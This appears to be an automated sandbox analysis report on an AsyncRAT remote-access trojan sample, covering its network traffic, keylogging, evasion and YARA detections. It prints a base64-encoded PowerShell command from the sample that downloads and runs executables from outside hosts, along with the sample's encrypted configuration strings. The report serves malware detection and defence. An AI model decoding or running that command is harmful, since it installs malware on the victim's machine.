Date(i).getMonth()+1,s=encodeURI(`https://www.linkedin.com/profile/add?startTask=CERTIFICATION_NAME&name=${t.title}&organizationId=${o}&issueYear=${n(t.awardedOn)}&issueMonth=${r(t.awardedOn)}&expirationYear=${t.expiresOn?n(t.expiresOn):""}&expirationMonth=${t.expiresOn?r(t.expiresOn):""}&certUrl=${e}&certId=${t.credentialId}&skills=${t.skills?`${t.skills.map(i=>encodeURIComponent(i)).join(",")}`:""}`);return m` equals www.linkedin.com (Linkedin)
Source: chromecache_101.5.dr	String found in binary or memory: </section>`}function Xne(t=dx,e=xd){return Aa(rH,t,e)}function ere(t=bx,e=gx){return Aa(E2,t,e)}var yA=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(yA\|\|{}),nEe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function hy(t,e,o){let n=encodeURIComponent(e),r=new URL(t);r.hostname="learn.microsoft.com";let s=r.href+=(t.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=R.sharingId?`&sharingId=${R.sharingId}`:"";return Object.values(yA).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let u=encodeURIComponent(s+c+i),d=o?.achievementCopyTitle?.overrideTitle??e,p=encodeURIComponent($9.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${d}`:`"${d}"`)),f={achievementCopy:p,url:u,title:n,body:`${p}${encodeURIComponent(` equals www.facebook.com (Facebook)
Source: chromecache_101.5.dr	String found in binary or memory: </section>`}function Xne(t=dx,e=xd){return Aa(rH,t,e)}function ere(t=bx,e=gx){return Aa(E2,t,e)}var yA=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(yA\|\|{}),nEe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function hy(t,e,o){let n=encodeURIComponent(e),r=new URL(t);r.hostname="learn.microsoft.com";let s=r.href+=(t.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=R.sharingId?`&sharingId=${R.sharingId}`:"";return Object.values(yA).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let u=encodeURIComponent(s+c+i),d=o?.achievementCopyTitle?.overrideTitle??e,p=encodeURIComponent($9.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${d}`:`"${d}"`)),f={achievementCopy:p,url:u,title:n,body:`${p}${encodeURIComponent(` equals www.linkedin.com (Linkedin)
Source: chromecache_101.5.dr	String found in binary or memory: </section>`}function Xne(t=dx,e=xd){return Aa(rH,t,e)}function ere(t=bx,e=gx){return Aa(E2,t,e)}var yA=(s=>(s.facebook="facebook",s.twitter="twitter",s.linkedin="linkedin",s.email="email",s.weibo="weibo",s))(yA\|\|{}),nEe={facebook:"https://www.facebook.com/sharer/sharer.php?u={url}",twitter:"https://twitter.com/intent/tweet?original_referer={url}&text={achievementCopy}&tw_p=tweetbutton&url={url}",linkedin:"https://www.linkedin.com/feed/?shareActive=true&text={body}",email:"mailto:?subject={subject}&body={body}",weibo:"http://service.weibo.com/share/share.php?title={title}&url={url}"};function hy(t,e,o){let n=encodeURIComponent(e),r=new URL(t);r.hostname="learn.microsoft.com";let s=r.href+=(t.indexOf("?")!==-1?"&":"?")+"WT.mc_id=",i=R.sharingId?`&sharingId=${R.sharingId}`:"";return Object.values(yA).reduce((l,c)=>{if(_.data.isPermissioned)return l[c]="#",l;let u=encodeURIComponent(s+c+i),d=o?.achievementCopyTitle?.overrideTitle??e,p=encodeURIComponent($9.replace("{achievementTitle}",o?.achievementCopyTitle?.isUnquoted?`${d}`:`"${d}"`)),f={achievementCopy:p,url:u,title:n,body:`${p}${encodeURIComponent(` equals www.twitter.com (Twitter)

Source: global traffic	DNS traffic detected: DNS query: js.monitor.azure.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: mdec.nelreports.net

Source: chromecache_101.5.dr	String found in binary or memory: http://polymer.github.io/AUTHORS.txt
Source: chromecache_101.5.dr	String found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
Source: chromecache_101.5.dr	String found in binary or memory: http://polymer.github.io/LICENSE.txt
Source: chromecache_101.5.dr	String found in binary or memory: http://polymer.github.io/PATENTS.txt
Source: chromecache_85.5.dr	String found in binary or memory: http://schema.org/Organization
Source: chromecache_85.5.dr	String found in binary or memory: https://aka.ms/ContentUserFeedback
Source: chromecache_101.5.dr	String found in binary or memory: https://aka.ms/MSBuildChallenge/T1?ocid=build24_csc_learnpromo_T1_cnl
Source: chromecache_101.5.dr	String found in binary or memory: https://aka.ms/banner_mslearn_tier1?wt.mc_id=build24_t1_learnpromotion_events
Source: chromecache_101.5.dr	String found in binary or memory: https://aka.ms/certhelp
Source: chromecache_85.5.dr, chromecache_75.5.dr, chromecache_106.5.dr	String found in binary or memory: https://aka.ms/feedback/report?space=61
Source: chromecache_101.5.dr	String found in binary or memory: https://aka.ms/pshelpmechoose
Source: chromecache_85.5.dr	String found in binary or memory: https://aka.ms/yourcaliforniaprivacychoices
Source: chromecache_85.5.dr	String found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/69c76c32-967e-4c65-b89a-74cc527db725
Source: chromecache_85.5.dr	String found in binary or memory: https://authoring-docs-microsoft.poolparty.biz/devrel/7696cda6-0510-47f6-8302-71bb5d2e28cf
Source: chromecache_101.5.dr	String found in binary or memory: https://aznb-ame-prod.azureedge.net/component/$
Source: chromecache_101.5.dr	String found in binary or memory: https://channel9.msdn.com/
Source: chromecache_101.5.dr	String found in binary or memory: https://github.com/$
Source: chromecache_85.5.dr	String found in binary or memory: https://github.com/Thraka
Source: chromecache_85.5.dr	String found in binary or memory: https://github.com/Youssef1313
Source: chromecache_85.5.dr	String found in binary or memory: https://github.com/adegeo
Source: chromecache_85.5.dr	String found in binary or memory: https://github.com/dotnet/docs/blob/17c4acca45e573a92878a44a2cce57d699fe9c7c/docs/framework/install/
Source: chromecache_85.5.dr	String found in binary or memory: https://github.com/dotnet/docs/blob/live/docs/framework/install/application-not-started.md
Source: chromecache_85.5.dr	String found in binary or memory: https://github.com/dotnet/docs/blob/main/docs/framework/install/application-not-started.md
Source: chromecache_85.5.dr	String found in binary or memory: https://github.com/dotnet/docs/issues
Source: chromecache_85.5.dr	String found in binary or memory: https://github.com/dotnet/docs/issues/new?template=z-customer-feedback.yml
Source: chromecache_101.5.dr	String found in binary or memory: https://github.com/dotnet/try
Source: chromecache_85.5.dr	String found in binary or memory: https://github.com/gewarren
Source: chromecache_101.5.dr	String found in binary or memory: https://github.com/jonschlinkert/is-plain-object
Source: chromecache_101.5.dr	String found in binary or memory: https://github.com/js-cookie/js-cookie
Source: chromecache_85.5.dr	String found in binary or memory: https://github.com/mairaw
Source: chromecache_85.5.dr	String found in binary or memory: https://github.com/nschonni
Source: chromecache_85.5.dr	String found in binary or memory: https://js.monitor.azure.com/scripts/c/ms.jsll-3.min.js
Source: chromecache_101.5.dr	String found in binary or memory: https://learn-video.azurefd.net/
Source: chromecache_101.5.dr	String found in binary or memory: https://learn-video.azurefd.net/vod/player
Source: chromecache_101.5.dr	String found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/consoles/default?api-version=2017-12-01-prev
Source: chromecache_101.5.dr	String found in binary or memory: https://management.azure.com/providers/Microsoft.Portal/userSettings/cloudconsole?api-version=2017-0
Source: chromecache_101.5.dr	String found in binary or memory: https://management.azure.com/subscriptions?api-version=2016-06-01
Source: chromecache_101.5.dr	String found in binary or memory: https://octokit.github.io/rest.js/#throttling
Source: chromecache_101.5.dr	String found in binary or memory: https://schema.org
Source: chromecache_101.5.dr	String found in binary or memory: https://twitter.com/intent/tweet?original_referer=$
Source: chromecache_101.5.dr	String found in binary or memory: https://www.linkedin.com/cws/share?url=$
Source: chromecache_101.5.dr	String found in binary or memory: https://www.linkedin.com/profile/add?startTask=CERTIFICATION_NAME&name=$

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown	HTTPS traffic detected: 2.19.104.72:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 2.19.104.72:443 -> 192.168.2.6:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.6:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.6:49796 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected AsyncRAT

Source: Yara match	File source: 0pF5Vz4xG4.exe, type: SAMPLE
Source: Yara match	File source: 0.0.0pF5Vz4xG4.exe.b70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2095950436.0000000000B72000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 0pF5Vz4xG4.exe PID: 7156, type: MEMORYSTR

Contains functionality to log keystrokes (.Net Source)

Source: 0pF5Vz4xG4.exe, Keylogger.cs

.Net Code: KeyboardLayout

System Summary

Malicious sample detected (through community Yara rule)

Source: 0pF5Vz4xG4.exe, type: SAMPLE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0.0.0pF5Vz4xG4.exe.b70000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen

PE file does not import any functions

Source: 0pF5Vz4xG4.exe

Static PE information: No import functions for PE file found

Sample file is different than original file name gathered from version info

Source: 0pF5Vz4xG4.exe, 00000000.00000000.2095950436.0000000000B72000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameClientx64.exe" vs 0pF5Vz4xG4.exe
Source: 0pF5Vz4xG4.exe	Binary or memory string: OriginalFilenameClientx64.exe" vs 0pF5Vz4xG4.exe

Yara signature match

Source: 0pF5Vz4xG4.exe, type: SAMPLE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.0.0pF5Vz4xG4.exe.b70000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI

Source: 0pF5Vz4xG4.exe, Program.cs	Base64 encoded string: 'L2MgcG93ZXJzaGVsbCAoTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudCkuRG93bmxvYWRGaWxlKCdodHRwOi8veGN1LmV4Z2FtaW5nLmNsaWNrJywgJyVUZW1wJVxcRXhwSW9yZXIuZXhlJykgJiBwb3dlcnNoZWxsIChOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KS5Eb3dubG9hZEZpbGUoJ2h0dHA6Ly94Y3U1LmV4Z2FtaW5nLmNsaWNrJywgJyVUZW1wJVxcRXhwbElvcmVyLmV4ZScpICYgcG93ZXJzaGVsbCBTdGFydC1Qcm9jZXNzIC1GaWxlUGF0aCAnJVRlbXAlXFxFeHBJb3Jlci5leGUnICYgcG93ZXJzaGVsbCBTdGFydC1Qcm9jZXNzIC1GaWxlUGF0aCAnJVRlbXAlXFxFeHBsSW9yZXIuZXhlJyAmIGV4aXQ='
Source: 0pF5Vz4xG4.exe, Settings.cs	Base64 encoded string: 'jXkAxQKdxWdKf6MulZtlNYU6T4qEdxLMPLu5+y70FwxaPzWHBOZsjaBJqdi8N/R7QrkuvKKrnqzxiMRLwavn3Q==', 'ozEtu3hRDvdntQ14K2rVsFw+W+1ePWsKMq82RBY/lS5QZlGsUkLLNq6N4B85bGE4caoqd/pKC2NTiNKftn85/w==', 'lJWcKE/WisnnPmk/afSaGnNNWfh3Z1YjCbaMyzuNbOE+WU7HqgcR1+ArYpqJRCnepG1be7lg2FIqcKZYCej1yMmak+W9vHZrWTyH9wbaX3JiSbBxIrmOeyHtSIOmoUc1', 'y/3x+hsSnm+9ccbUAPkqO4rO8Ux4onUjfKbe0vO0M8YdZNCXg74/pUCReRIf5KErux32JKbTqEuKL6x1UM4q9g==', 'PcwdjTKFAMgG3RHtaI7nTq63q8Eo8JQXLND55HmnBxDj7yCNlO/tUriInA85OeRIhQX6AJLdBKvLVtbRZKanDwGvA/WyTk/9TuqreAY49jM=', 'XDXpkYhRS8WGYilk/4IwGqgzIW11grYJw7JapruAB0xrqC6zbbRDY7NHOxwXP6zyR2jqXaTgLCmIXQJ46iLAWlDB/egix4ythub7pRzZagwovoc96IeBfhPbXB7ZDAjTudVyp5KzXzNEJPyNwRRaqe5hY7OuL8chiYEU5i9QS8mafScnga6mHFJ88BeNqyizx1wkkCUr79P0eVi5U4hr1Zww1JYUYdJvzoTCyQ99BZHPd4ihZ9kmvVnlwSPsvMD+Wa+uWhyGUb7TdQElgF33aOli+SCVoCY8VOjbwbo82c0ZggzMI5flBv31eHJLFM4xm1xsHN4gFgtK0d3U04OS/mH9d0wPWsPkcoX6tgsPPt/XhcjNHFUx2Q21w2fYK4fehfY+9Zysw2vF7cGN1CbkJ/E1wPxUtjovRcNfwC3owD25sYiZpz42G4rRx04xlM+FniB+z4UApadENJuDmJjKJU7RPD29eDSsgRdUEhGj4ISu7BH7ne08/RsPjOSKVNRtdLn08+gEZTxAV7ldzVtt9lHMXDcMsLxdcNrvWgdth7fCUO+caJQMG67RS7nFdh9woxNrnsL6QCv3DgAdanvn0+2+Hw6/IG+aEJZjoJfzpbNoCLSZ6dGJCXbtwN0/LGKzgdi4HlTQxqqDWKOoKC3eWypqoj/dU8VSNnQgvR9VKXscsADepAZN39+Hh3k1RZqwNqtFKD0C9jR67YeIItM3zZVxgdH7aQfL2wL/woUFccfr580vtt3b3bAd4uYxvQJRmucI6gnBOm12vso6IhxXiHP3QnoQp5SKaTOIvyfTAtC6qEy22uzLSD1YI8nXWapaqoPf9UcGHTBo5jQLUfsakL3zp6LtWFjd6+Gax35w06GtNb7YxJmuurxp+HNQukAcrEdxcsWy46FxahqwT1txNMIb3DaIv9AzvrYwJZ9kQWQ5DBTlEYJE2qhjcy5Qx09upxM/FN6VqzPJcT7jTBAWE6qsBHrVdvj2EDPKdpXQD/Me5Mudu7qtK9hlXnQHDM7GYXKygtfjN3gzJcZ0dQG5G/0vGeuUaLkP+H8TetwxOIhtq09lhHeuM8YFWt25yDZ+', 'KiKGTpI4rxj6QQT4E4kJI+SnHTdj1UbcJmKNvHjX6/DBF5p7yJFVfH4I9rkp7syoYn0OxqslJ86j9Abh7e7AhA==', 'vbGJqivXh6TY//32e3NkAMsK3inu7RLf9cK35T1C/AkMmT/TUmcHpChY9BLfk3lm2ySPPE2tirk820n/Furu8w==', 'qo/SK2p+f/Zfm9FtCYaV5XME0G3kCCAfriHdDkUi5OOlp5Cb7AN6CJsVHGFTdrhSAj5VDDwIGV+NEtnIkznSXA==', 'l7knJCzKqw68RMnowgrOjgqCjO54idsEdj2eVkR1Cn8iMS8wSYPjDI68uHet/iIWFCCjtVs15M5kVusbV3iyLw=='

Source: classification engine

Classification label: mal96.troj.spyw.evad.winEXE@25/59@8/5

Source: 0pF5Vz4xG4.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0pF5Vz4xG4.exe

Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%

Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 0pF5Vz4xG4.exe

Virustotal: Detection: 50%

Source: unknown	Process created: C:\Users\user\Desktop\0pF5Vz4xG4.exe "C:\Users\user\Desktop\0pF5Vz4xG4.exe"
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0pF5Vz4xG4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1556 --field-trial-handle=2072,i,2833464812255304590,11198771505965286401,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0pF5Vz4xG4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1928,i,15172110000776622718,9297871655836015958,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0pF5Vz4xG4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=0pF5Vz4xG4.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1556 --field-trial-handle=2072,i,2833464812255304590,11198771505965286401,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1928,i,15172110000776622718,9297871655836015958,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior

Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: windows.shell.servicehostbuilder.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe	Section loaded: wkscli.dll	Jump to behavior

Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1A66AEDC-93C3-4ACC-BA96-08F5716429F7}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\0pF5Vz4xG4.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Access\Capabilities\UrlAssociations

Jump to behavior

Source: 0pF5Vz4xG4.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: 0pF5Vz4xG4.exe

Static file information: File size 6596488 > 1048576

Source: 0pF5Vz4xG4.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains potential unpacker

Source: 0pF5Vz4xG4.exe, ClientSocket.cs

.Net Code: Invoke System.AppDomain.Load(byte[])

Boot Survival

Yara detected AsyncRAT

Source: Yara match	File source: 0pF5Vz4xG4.exe, type: SAMPLE
Source: Yara match	File source: 0.0.0pF5Vz4xG4.exe.b70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2095950436.0000000000B72000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 0pF5Vz4xG4.exe PID: 7156, type: MEMORYSTR

Malware Analysis System Evasion

Yara detected AsyncRAT

Source: Yara match	File source: 0pF5Vz4xG4.exe, type: SAMPLE
Source: Yara match	File source: 0.0.0pF5Vz4xG4.exe.b70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.2095950436.0000000000B72000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 0pF5Vz4xG4.exe PID: 7156, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: 0pF5Vz4xG4.exe

Binary or memory string: TASKMGR.EXE#PROCESSHACKER.EXE

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: 0pF5Vz4xG4.exe, Keylogger.cs	Reference to suspicious API methods: MapVirtualKey(vkCode, 0u)
